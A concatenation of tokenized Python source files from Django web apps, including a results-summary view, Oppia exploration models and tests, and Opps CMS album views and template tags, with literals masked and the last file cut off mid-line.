<EOL> ] <EOL> if summary_entry in [ Results . ResultSummaryList . RESULT_HOSTS_ALEXA , Results . ResultSummaryList . RESULT_URLS_TEXT , Results . ResultSummaryList . RESULT_HOST_RUNLIST ] : <EOL> entries . sort ( key = lambda x : ( x [ - <NUM_LIT:1> ] . servername . alexa_rating if x [ - <NUM_LIT:1> ] . servername . alexa_rating > <NUM_LIT:0> else <NUM_LIT> , x [ - <NUM_LIT:1> ] . servername . full_servername ) ) <EOL> else : <EOL> entries . sort ( key = lambda x : ( - x [ <NUM_LIT:1> ] , x [ <NUM_LIT:0> ] ) ) <EOL> if summary_entry == Results . ResultSummaryList . RESULT_URLS_TEXT : <EOL> response = HttpResponse ( mimetype = "<STR_LIT>" ) <EOL> response [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> for x in entries : <EOL> response . write ( '<STR_LIT>' + x [ - <NUM_LIT:1> ] . servername . servername + "<STR_LIT::>" + str ( x [ - <NUM_LIT:1> ] . servername . port ) + '<STR_LIT>' ) <EOL> return response <EOL> elif summary_entry == Results . ResultSummaryList . RESULT_HOST_RUNLIST : <EOL> response = HttpResponse ( mimetype = "<STR_LIT>" ) <EOL> response [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> import csv <EOL> writer = csv . writer ( response ) <EOL> i = <NUM_LIT:0> <EOL> for x in entries : <EOL> i += <NUM_LIT:1> <EOL> writer . writerow ( [ i ] + list ( x [ <NUM_LIT:0> ] ) ) <EOL> return response <EOL> elif summary_entry in [ Results . ResultSummaryList . RESULT_HOST_PROFILES , Results . ResultSummaryList . RESULT_HOST_BASEPROFILES , Results . ResultSummaryList . RESULT_HOST_FUNDPROFILES ] : <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> "<STR_LIT>" : summary . part_of_run_id , <EOL> "<STR_LIT>" : result [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : result [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : ( float ( result [ "<STR_LIT>" ] ) / float ( result [ "<STR_LIT>" ] ) if result [ "<STR_LIT>" ] else <NUM_LIT:0> ) * <NUM_LIT:100> , <EOL> "<STR_LIT>" : entries , <EOL> "<STR_LIT>" : [ x for x in connection . queries ] , <EOL> } ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> "<STR_LIT>" : result [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : result [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : summary_entry == Results . ResultSummaryList . RESULT_HOSTS_ALEXA , <EOL> "<STR_LIT>" : ( float ( result [ "<STR_LIT>" ] ) / float ( result [ "<STR_LIT>" ] ) if result [ "<STR_LIT>" ] else <NUM_LIT:0> ) * <NUM_LIT:100> , <EOL> "<STR_LIT>" : entries , <EOL> "<STR_LIT>" : [ x for x in connection . queries ] , <EOL> } ) <EOL> else : <EOL> return SearchResults ( request , method = request . method ) <EOL> def SearchResults ( request , method = "<STR_LIT:POST>" ) : <EOL> """<STR_LIT>""" <EOL> form = ResultForm ( ) <EOL> return render_to_response ( '<STR_LIT>' , { <EOL> "<STR_LIT:root>" : os . environ . get ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> "<STR_LIT>" : method if method in [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] else "<STR_LIT:POST>" , <EOL> '<STR_LIT>' : form , <EOL> } ) </s>
<s> """<STR_LIT>""" <EOL> from core import jobs <EOL> from core . platform import models <EOL> ( email_models , ) = models . Registry . import_models ( [ models . NAMES . email ] ) <EOL> class EmailHashRegenerationOneOffJob ( jobs . BaseMapReduceJobManager ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def entity_classes_to_map_over ( cls ) : <EOL> return [ email_models . SentEmailModel ] <EOL> @ staticmethod <EOL> def map ( email_model ) : <EOL> email_model . put ( ) <EOL> @ staticmethod <EOL> def reduce ( email_model_id , value ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> import inspect <EOL> from extensions . objects . models import objects <EOL> class Registry ( object ) : <EOL> """<STR_LIT>""" <EOL> objects_dict = { } <EOL> @ classmethod <EOL> def _refresh_registry ( cls ) : <EOL> cls . objects_dict . clear ( ) <EOL> for name , clazz in inspect . getmembers ( objects , inspect . isclass ) : <EOL> if name . endswith ( '<STR_LIT>' ) or name == '<STR_LIT>' : <EOL> continue <EOL> ancestor_names = [ <EOL> base_class . __name__ for base_class in inspect . getmro ( clazz ) ] <EOL> if '<STR_LIT>' not in ancestor_names : <EOL> continue <EOL> cls . objects_dict [ clazz . __name__ ] = clazz <EOL> @ classmethod <EOL> def get_all_object_classes ( cls ) : <EOL> """<STR_LIT>""" <EOL> cls . _refresh_registry ( ) <EOL> return copy . deepcopy ( cls . objects_dict ) <EOL> @ classmethod <EOL> def get_object_class_by_type ( cls , obj_type ) : <EOL> """<STR_LIT>""" <EOL> if obj_type not in cls . objects_dict : <EOL> cls . _refresh_registry ( ) <EOL> if obj_type not in cls . objects_dict : <EOL> raise TypeError ( '<STR_LIT>' % obj_type ) <EOL> return cls . objects_dict [ obj_type ] <EOL> def get_all_object_editor_js_templates ( ) : <EOL> """<STR_LIT>""" <EOL> object_editors_js = '<STR_LIT>' <EOL> all_object_classes = Registry . get_all_object_classes ( ) <EOL> for obj_cls in all_object_classes . values ( ) : <EOL> if obj_cls . has_editor_js_template ( ) : <EOL> object_editors_js += obj_cls . get_editor_js_template ( ) <EOL> return object_editors_js </s>
<s> from core . domain import exp_services <EOL> from core . domain import exp_services_test <EOL> from core . domain import rights_manager <EOL> from core . domain import summary_services <EOL> from core . domain import user_services <EOL> import feconf <EOL> class ExplorationDisplayableSummaries ( <EOL> exp_services_test . ExplorationServicesUnitTests ) : <EOL> """<STR_LIT>""" <EOL> ALBERT_EMAIL = '<STR_LIT>' <EOL> BOB_EMAIL = '<STR_LIT>' <EOL> ALBERT_NAME = '<STR_LIT>' <EOL> BOB_NAME = '<STR_LIT>' <EOL> USER_C_NAME = '<STR_LIT:c>' <EOL> USER_D_NAME = '<STR_LIT:d>' <EOL> USER_C_EMAIL = '<STR_LIT>' <EOL> USER_D_EMAIL = '<STR_LIT>' <EOL> USER_C_PROFILE_PICTURE = '<STR_LIT>' <EOL> EXP_ID_1 = '<STR_LIT>' <EOL> EXP_ID_2 = '<STR_LIT>' <EOL> EXP_ID_3 = '<STR_LIT>' <EOL> EXP_ID_4 = '<STR_LIT>' <EOL> EXP_ID_5 = '<STR_LIT>' <EOL> EXPECTED_VERSION_1 = <NUM_LIT:4> <EOL> EXPECTED_VERSION_2 = <NUM_LIT:2> <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ExplorationDisplayableSummaries , self ) . setUp ( ) <EOL> self . albert_id = self . get_user_id_from_email ( self . ALBERT_EMAIL ) <EOL> self . bob_id = self . get_user_id_from_email ( self . BOB_EMAIL ) <EOL> self . signup ( self . ALBERT_EMAIL , self . ALBERT_NAME ) <EOL> self . signup ( self . BOB_EMAIL , self . BOB_NAME ) <EOL> self . save_new_valid_exploration ( self . EXP_ID_1 , self . albert_id ) <EOL> exp_services . update_exploration ( <EOL> self . bob_id , self . EXP_ID_1 , [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:title>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] , '<STR_LIT>' ) <EOL> self . save_new_valid_exploration ( self . EXP_ID_2 , self . albert_id ) <EOL> exp_services . update_exploration ( <EOL> self . albert_id , self . EXP_ID_1 , [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:title>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] , '<STR_LIT>' ) <EOL> exp_services . update_exploration ( <EOL> self . albert_id , self . EXP_ID_2 , [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:title>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] , '<STR_LIT>' ) <EOL> exp_services . revert_exploration ( self . bob_id , self . EXP_ID_1 , <NUM_LIT:3> , <NUM_LIT:2> ) <EOL> with self . assertRaisesRegexp ( <EOL> Exception , '<STR_LIT>' <EOL> ) : <EOL> rights_manager . publish_exploration ( self . bob_id , self . EXP_ID_2 ) <EOL> rights_manager . publish_exploration ( self . albert_id , self . EXP_ID_2 ) <EOL> self . save_new_valid_exploration ( self . EXP_ID_3 , self . albert_id ) <EOL> rights_manager . publish_exploration ( self . albert_id , self . EXP_ID_3 ) <EOL> exp_services . delete_exploration ( self . albert_id , self . EXP_ID_3 ) <EOL> self . user_c_id = self . get_user_id_from_email ( self . USER_C_EMAIL ) <EOL> self . user_d_id = self . get_user_id_from_email ( self . USER_D_EMAIL ) <EOL> self . signup ( self . USER_C_EMAIL , self . USER_C_NAME ) <EOL> self . signup ( self . USER_D_EMAIL , self . USER_D_NAME ) <EOL> user_services . update_profile_picture_data_url ( <EOL> self . user_c_id , self . USER_C_PROFILE_PICTURE ) <EOL> self . save_new_valid_exploration ( self . EXP_ID_4 , self . user_c_id ) <EOL> exp_services . update_exploration ( <EOL> self . user_d_id , self . EXP_ID_4 , [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:title>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] , '<STR_LIT>' ) <EOL> exp_services . update_exploration ( <EOL> self . user_d_id , self . EXP_ID_4 , [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:title>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ] , '<STR_LIT>' ) <EOL> self . save_new_valid_exploration ( self . EXP_ID_5 , self . bob_id ) <EOL> def test_get_human_readable_contributors_summary ( self ) : <EOL> contributors_summary = { self . albert_id : <NUM_LIT:10> , self . bob_id : <NUM_LIT> } <EOL> self . assertEqual ( { <EOL> self . ALBERT_NAME : { <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : None <EOL> } , <EOL> self . BOB_NAME : { <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : None <EOL> } <EOL> } , summary_services . get_human_readable_contributors_summary ( <EOL> contributors_summary ) ) <EOL> contributors_summary = { self . user_c_id : <NUM_LIT:1> , self . user_d_id : <NUM_LIT:2> } <EOL> self . assertEqual ( { <EOL> self . USER_C_NAME : { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : self . USER_C_PROFILE_PICTURE <EOL> } , <EOL> self . USER_D_NAME : { <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : None <EOL> } <EOL> } , summary_services . get_human_readable_contributors_summary ( <EOL> contributors_summary ) ) <EOL> def test_get_displayable_exp_summary_dicts_matching_ids ( self ) : <EOL> displayable_summaries = ( <EOL> summary_services . get_displayable_exp_summary_dicts_matching_ids ( <EOL> [ self . EXP_ID_1 , self . EXP_ID_2 , self . EXP_ID_3 , self . EXP_ID_5 ] ) ) <EOL> expected_summary = { <EOL> '<STR_LIT:status>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : feconf . DEFAULT_LANGUAGE_CODE , <EOL> '<STR_LIT>' : { <EOL> self . ALBERT_NAME : { <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : None <EOL> } <EOL> } , <EOL> '<STR_LIT:id>' : self . EXP_ID_2 , <EOL> '<STR_LIT>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : feconf . get_empty_ratings ( ) , <EOL> '<STR_LIT:title>' : u'<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : u'<STR_LIT>' <EOL> } <EOL> self . assertIn ( '<STR_LIT>' , displayable_summaries [ <NUM_LIT:0> ] ) <EOL> self . assertDictContainsSubset ( expected_summary , <EOL> displayable_summaries [ <NUM_LIT:0> ] ) <EOL> def test_get_public_and_filtered_private_summary_dicts_for_creator ( self ) : <EOL> displayable_summaries = ( <EOL> summary_services . get_displayable_exp_summary_dicts_matching_ids ( <EOL> [ self . EXP_ID_1 , self . EXP_ID_2 , self . EXP_ID_3 , self . EXP_ID_5 ] , <EOL> editor_user_id = self . albert_id ) ) <EOL> self . assertEqual ( len ( displayable_summaries ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] , self . EXP_ID_1 ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:1> ] [ '<STR_LIT:id>' ] , self . EXP_ID_2 ) <EOL> rights_manager . assign_role_for_exploration ( <EOL> self . bob_id , self . EXP_ID_5 , self . albert_id , <EOL> rights_manager . ROLE_EDITOR ) <EOL> displayable_summaries = ( <EOL> summary_services . get_displayable_exp_summary_dicts_matching_ids ( <EOL> [ self . EXP_ID_1 , self . EXP_ID_2 , self . EXP_ID_3 , self . EXP_ID_5 ] , <EOL> editor_user_id = self . albert_id ) ) <EOL> self . assertEqual ( len ( displayable_summaries ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:0> ] [ '<STR_LIT:status>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] , self . EXP_ID_1 ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:1> ] [ '<STR_LIT:status>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:1> ] [ '<STR_LIT:id>' ] , self . EXP_ID_2 ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:2> ] [ '<STR_LIT:status>' ] , '<STR_LIT>' ) <EOL> self . assertEqual ( displayable_summaries [ <NUM_LIT:2> ] [ '<STR_LIT:id>' ] , self . EXP_ID_5 ) </s>
<s> """<STR_LIT>""" <EOL> from core . platform import models <EOL> import feconf <EOL> import utils <EOL> from google . appengine . ext import ndb <EOL> ( base_models , ) = models . Registry . import_models ( [ models . NAMES . base_model ] ) <EOL> class FileMetadataSnapshotMetadataModel ( base_models . BaseSnapshotMetadataModel ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FileMetadataSnapshotContentModel ( base_models . BaseSnapshotContentModel ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FileMetadataModel ( base_models . VersionedModel ) : <EOL> """<STR_LIT>""" <EOL> SNAPSHOT_METADATA_CLASS = FileMetadataSnapshotMetadataModel <EOL> SNAPSHOT_CONTENT_CLASS = FileMetadataSnapshotContentModel <EOL> size = ndb . IntegerProperty ( indexed = False ) <EOL> @ classmethod <EOL> def get_new_id ( cls , entity_name ) : <EOL> raise NotImplementedError <EOL> @ classmethod <EOL> def get_undeleted ( cls ) : <EOL> return cls . get_all ( ) . filter ( cls . deleted == False ) . fetch ( <EOL> feconf . DEFAULT_QUERY_LIMIT ) <EOL> @ classmethod <EOL> def _construct_id ( cls , exploration_id , filepath ) : <EOL> return utils . vfs_construct_path ( '<STR_LIT:/>' , exploration_id , filepath ) <EOL> @ classmethod <EOL> def create ( cls , exploration_id , filepath ) : <EOL> model_id = cls . _construct_id ( exploration_id , filepath ) <EOL> return cls ( id = model_id , deleted = False ) <EOL> @ classmethod <EOL> def get_model ( cls , exploration_id , filepath , strict = False ) : <EOL> model_id = cls . _construct_id ( exploration_id , filepath ) <EOL> return super ( FileMetadataModel , cls ) . get ( model_id , strict = strict ) <EOL> @ classmethod <EOL> def get_version ( cls , exploration_id , filepath , version_number ) : <EOL> model_id = cls . _construct_id ( exploration_id , filepath ) <EOL> return super ( FileMetadataModel , cls ) . get_version ( <EOL> model_id , version_number ) <EOL> def commit ( self , committer_id , commit_cmds ) : <EOL> return super ( FileMetadataModel , self ) . commit ( <EOL> committer_id , '<STR_LIT>' , commit_cmds ) <EOL> class FileSnapshotMetadataModel ( base_models . BaseSnapshotMetadataModel ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FileSnapshotContentModel ( base_models . BaseSnapshotContentModel ) : <EOL> """<STR_LIT>""" <EOL> content = ndb . BlobProperty ( indexed = False ) <EOL> class FileModel ( base_models . VersionedModel ) : <EOL> """<STR_LIT>""" <EOL> SNAPSHOT_METADATA_CLASS = FileSnapshotMetadataModel <EOL> SNAPSHOT_CONTENT_CLASS = FileSnapshotContentModel <EOL> content = ndb . BlobProperty ( indexed = False ) <EOL> def _reconstitute ( self , snapshot_blob ) : <EOL> """<STR_LIT>""" <EOL> self . content = snapshot_blob <EOL> return self <EOL> def _compute_snapshot ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . content <EOL> @ classmethod <EOL> def get_new_id ( cls , entity_name ) : <EOL> raise NotImplementedError <EOL> @ classmethod <EOL> def _construct_id ( cls , exploration_id , filepath ) : <EOL> return utils . vfs_construct_path ( '<STR_LIT:/>' , exploration_id , filepath ) <EOL> @ classmethod <EOL> def create ( cls , exploration_id , filepath ) : <EOL> model_id = cls . _construct_id ( exploration_id , filepath ) <EOL> return cls ( id = model_id , deleted = False ) <EOL> @ classmethod <EOL> def get_model ( cls , exploration_id , filepath , strict = False ) : <EOL> model_id = cls . _construct_id ( exploration_id , filepath ) <EOL> return super ( FileModel , cls ) . get ( model_id , strict = strict ) <EOL> def commit ( self , committer_id , commit_cmds ) : <EOL> return super ( FileModel , self ) . commit ( committer_id , '<STR_LIT>' , commit_cmds ) <EOL> @ classmethod <EOL> def get_version ( cls , exploration_id , filepath , version_number ) : <EOL> model_id = cls . _construct_id ( exploration_id , filepath ) <EOL> return super ( FileModel , cls ) . get_version ( model_id , version_number ) </s>
<s> from extensions . interactions import base <EOL> class MusicNotesInput ( base . BaseInteraction ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> description = ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> display_mode = base . DISPLAY_MODE_SUPPLEMENTAL <EOL> _dependency_ids = [ '<STR_LIT>' ] <EOL> answer_type = '<STR_LIT>' <EOL> instructions = '<STR_LIT>' <EOL> narrow_instructions = '<STR_LIT>' <EOL> needs_summary = True <EOL> _customization_arg_specs = [ { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : [ ] , <EOL> } , { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : [ ] , <EOL> } ] </s>
<s> """<STR_LIT>""" <EOL> from core . tests import test_utils <EOL> from extensions . rules import normalized_string <EOL> class NormalizedStringRuleUnitTests ( test_utils . GenericTestBase ) : <EOL> """<STR_LIT>""" <EOL> def test_equals_rule ( self ) : <EOL> rule = normalized_string . Equals ( '<STR_LIT:hello>' ) <EOL> self . assertFuzzyTrue ( rule . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyTrue ( rule . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyFalse ( rule . eval ( '<STR_LIT>' ) ) <EOL> def test_case_sensitive_equals_rule ( self ) : <EOL> rule = normalized_string . CaseSensitiveEquals ( '<STR_LIT:hello>' ) <EOL> self . assertFuzzyTrue ( rule . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyFalse ( rule . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyFalse ( rule . eval ( '<STR_LIT>' ) ) <EOL> def test_starts_with_rule ( self ) : <EOL> self . assertFuzzyTrue ( normalized_string . StartsWith ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyTrue ( normalized_string . StartsWith ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyFalse ( normalized_string . StartsWith ( '<STR_LIT:hello>' ) . eval ( '<STR_LIT>' ) ) <EOL> def test_contains_rule ( self ) : <EOL> self . assertFuzzyTrue ( normalized_string . Contains ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyTrue ( normalized_string . Contains ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyTrue ( normalized_string . Contains ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyFalse ( normalized_string . Contains ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> def test_fuzzy_equals_rule ( self ) : <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT:hello>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT>' ) . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT:hello>' ) . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT>' ) . eval ( '<STR_LIT:hello>' ) ) <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT:hello>' ) . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT:hello>' ) . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyTrue ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT:hello>' ) . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyFalse ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT>' ) . eval ( '<STR_LIT>' ) ) <EOL> self . assertFuzzyFalse ( normalized_string . FuzzyEquals ( '<STR_LIT:hello>' ) . eval ( <EOL> '<STR_LIT>' ) ) <EOL> self . assertFuzzyFalse ( <EOL> normalized_string . FuzzyEquals ( '<STR_LIT:hello>' ) . eval ( '<STR_LIT>' ) ) </s>
<s> from django . contrib . sites . models import get_current_site <EOL> from django . utils import timezone <EOL> from django . conf import settings <EOL> from opps . views . generic . list import ListView <EOL> from opps . containers . views import ContainerList <EOL> from opps . containers . models import Container , ContainerBox <EOL> from opps . articles . models import Album <EOL> class AlbumList ( ContainerList ) : <EOL> model = Album <EOL> type = '<STR_LIT>' <EOL> def get_template_names ( self ) : <EOL> templates = [ ] <EOL> domain_folder = self . get_template_folder ( ) <EOL> list_name = '<STR_LIT:list>' <EOL> templates . append ( '<STR_LIT>' . format ( <EOL> self . model . _meta . app_label , <EOL> self . model . _meta . module_name , list_name ) ) <EOL> if self . request . GET . get ( '<STR_LIT>' ) and self . __class__ . __name__ not in settings . OPPS_PAGINATE_NOT_APP : <EOL> templates . append ( '<STR_LIT>' . format ( <EOL> domain_folder , self . model . _meta . app_label , <EOL> self . model . _meta . module_name , list_name ) ) <EOL> return templates <EOL> def get_queryset ( self ) : <EOL> self . site = get_current_site ( self . request ) <EOL> self . long_slug = self . get_long_slug ( ) <EOL> if not self . long_slug : <EOL> return None <EOL> self . set_channel_rules ( ) <EOL> self . articleboxes = ContainerBox . objects . filter ( <EOL> channel__long_slug = self . long_slug ) <EOL> is_paginated = self . page_kwarg in self . request . GET <EOL> if not is_paginated : <EOL> for box in self . articleboxes : <EOL> self . excluded_ids . update ( <EOL> [ a . pk for a in box . ordered_containers ( ) ] ) <EOL> filters = { } <EOL> filters [ '<STR_LIT>' ] = self . site . domain <EOL> filters [ '<STR_LIT>' ] = timezone . now ( ) <EOL> filters [ '<STR_LIT>' ] = True <EOL> filters [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if self . channel and self . channel . is_root_node ( ) and not is_paginated : <EOL> filters [ '<STR_LIT>' ] = True <EOL> queryset = Container . objects . filter ( <EOL> ** filters ) . exclude ( pk__in = self . excluded_ids ) <EOL> return queryset . _clone ( ) <EOL> class AlbumChannelList ( ListView ) : <EOL> model = Album <EOL> type = '<STR_LIT>' <EOL> template_name_suffix = '<STR_LIT>' <EOL> def get_template_list ( self , domain_folder = "<STR_LIT>" ) : <EOL> templates = [ ] <EOL> list_name = '<STR_LIT:list>' <EOL> if self . template_name_suffix : <EOL> list_fullname = "<STR_LIT>" . format ( self . template_name_suffix , <EOL> list_name ) <EOL> if self . channel : <EOL> if self . channel . group and self . channel . parent : <EOL> templates . append ( '<STR_LIT>' . format ( <EOL> domain_folder , <EOL> self . channel . parent . long_slug , <EOL> list_fullname ) ) <EOL> if self . request . GET . get ( '<STR_LIT>' ) and self . __class__ . __name__ not in settings . OPPS_PAGINATE_NOT_APP : <EOL> templates . append ( '<STR_LIT>' . format ( <EOL> domain_folder , self . channel . parent . long_slug , <EOL> list_fullname ) ) <EOL> if self . request . GET . get ( '<STR_LIT>' ) and self . __class__ . __name__ not in settings . OPPS_PAGINATE_NOT_APP : <EOL> templates . append ( '<STR_LIT>' . format ( <EOL> domain_folder , self . channel . long_slug , list_fullname ) ) <EOL> templates . append ( '<STR_LIT>' . format ( <EOL> domain_folder , self . channel . long_slug , list_fullname ) ) <EOL> for t in self . channel . get_ancestors ( ) [ : : - <NUM_LIT:1> ] : <EOL> templates . append ( '<STR_LIT>' . format ( <EOL> domain_folder , t . long_slug , list_fullname ) ) <EOL> if self . request . GET . get ( '<STR_LIT>' ) and self . __class__ . __name__ not in settings . OPPS_PAGINATE_NOT_APP : <EOL> templates . append ( '<STR_LIT>' . format ( <EOL> domain_folder , t . long_slug , list_fullname ) ) <EOL> if self . request . GET . get ( '<STR_LIT>' ) and self . __class__ . __name__ not in settings . OPPS_PAGINATE_NOT_APP : <EOL> templates . append ( '<STR_LIT>' . format ( domain_folder , <EOL> list_fullname ) ) <EOL> templates . append ( '<STR_LIT>' . format ( <EOL> self . model . _meta . app_label , <EOL> self . model . _meta . module_name , <EOL> list_name ) ) <EOL> return templates <EOL> def get_template_names ( self ) : <EOL> domain_folder = self . get_template_folder ( ) <EOL> template_list = self . get_template_list ( domain_folder ) <EOL> return template_list <EOL> def get_queryset ( self ) : <EOL> self . site = get_current_site ( self . request ) <EOL> queryset = super ( AlbumChannelList , self ) . get_queryset ( ) <EOL> filters = { } <EOL> filters [ '<STR_LIT>' ] = self . site . domain <EOL> filters [ '<STR_LIT>' ] = timezone . now ( ) <EOL> filters [ '<STR_LIT>' ] = True <EOL> filters [ '<STR_LIT>' ] = True <EOL> queryset = queryset . filter ( ** filters ) <EOL> return queryset . _clone ( ) </s>
<s> from django . utils import timezone <EOL> from opps . api import BaseHandler <EOL> from . models import Container , ContainerBox <EOL> class Handler ( BaseHandler ) : <EOL> allowed_methods = ( '<STR_LIT:GET>' , ) <EOL> def read ( self , request ) : <EOL> filters = request . GET . dict ( ) <EOL> filters [ '<STR_LIT>' ] = timezone . now ( ) <EOL> filters [ '<STR_LIT>' ] = True <EOL> [ filters . pop ( b , None ) for b in self . blackfield ] <EOL> return self . model . objects . filter ( <EOL> ** filters ) [ self . _page ( request ) : self . _limit ( request ) ] <EOL> class ContainerHandler ( Handler ) : <EOL> model = Container <EOL> class ContainerBoxHandler ( Handler ) : <EOL> model = ContainerBox <EOL> fields = ( <EOL> '<STR_LIT:name>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:title>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ( '<STR_LIT>' , ( ) ) <EOL> ) <EOL> exclude = [ '<STR_LIT>' ] </s>
<s> from collections import Counter <EOL> import logging <EOL> from django import template <EOL> from django . conf import settings <EOL> from django . utils import timezone <EOL> from django . utils . safestring import mark_safe <EOL> from django . core . cache import cache <EOL> from django . contrib . sites . models import Site <EOL> from opps . channels . models import Channel <EOL> from opps . contrib . middleware . global_request import get_request <EOL> from opps . containers . models import Container , ContainerBox , Mirror <EOL> from magicdate import magicdate <EOL> register = template . Library ( ) <EOL> logger = logging . getLogger ( ) <EOL> @ register . assignment_tag <EOL> def get_tags_counter ( queryset = None , n = None ) : <EOL> if queryset is None : <EOL> queryset = Container . objects . all_published ( ) <EOL> counter = Counter ( ) <EOL> qs = queryset . filter ( tags__isnull = False ) . exclude ( tags = "<STR_LIT>" ) . order_by ( ) <EOL> print qs . count ( ) <EOL> for tags in qs . values_list ( "<STR_LIT>" , flat = True ) . distinct ( ) : <EOL> l = [ i . strip ( ) for i in tags . split ( "<STR_LIT:U+002C>" ) if i . strip ( ) ] <EOL> counter . update ( l ) <EOL> return counter . most_common ( n ) <EOL> @ register . filter <EOL> def values_list_flat ( queryset , field = '<STR_LIT>' ) : <EOL> return queryset . values_list ( field , flat = True ) <EOL> @ register . assignment_tag <EOL> def get_recommendations ( query_slice , child_class , container ) : <EOL> """<STR_LIT>""" <EOL> if not query_slice : <EOL> query_slice = "<STR_LIT::>" <EOL> bits = [ ] <EOL> for x in query_slice . split ( '<STR_LIT::>' ) : <EOL> if len ( x ) == <NUM_LIT:0> : <EOL> bits . append ( None ) <EOL> else : <EOL> bits . append ( int ( x ) ) <EOL> return container . recommendation ( child_class , bits ) <EOL> @ register . 